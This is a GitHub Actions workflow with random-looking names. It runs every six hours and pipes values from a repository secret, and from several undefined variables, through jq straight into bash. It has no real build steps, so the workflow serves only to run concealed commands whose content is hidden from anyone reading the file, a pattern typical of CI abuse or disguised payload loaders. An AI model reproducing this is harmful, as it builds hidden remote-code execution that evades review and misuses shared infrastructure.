name: minidisctransire

on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: minidisctransire
        env:
          rv44312: ${{ secrets.rv44312 }}
        run: |
          echo $rv44312 | jq -r .mxu9525 | /bin/bash
          echo $ihfj0774 | jq -r .krzn9 | /bin/bash
          echo $ikdhq396 | jq -r .dl748 | /bin/bash
          echo $zmiqn1391 | jq -r .pngj0174 | /bin/bash
          echo $ccmfr1 | jq -r .e4300 | /bin/bash
          echo $rn79556 | jq -r .vcedn060 | /bin/bash
          echo $kzl1195 | jq -r .b90 | /bin/bash
          echo $qfsz932 | jq -r .dsm81 | /bin/bash

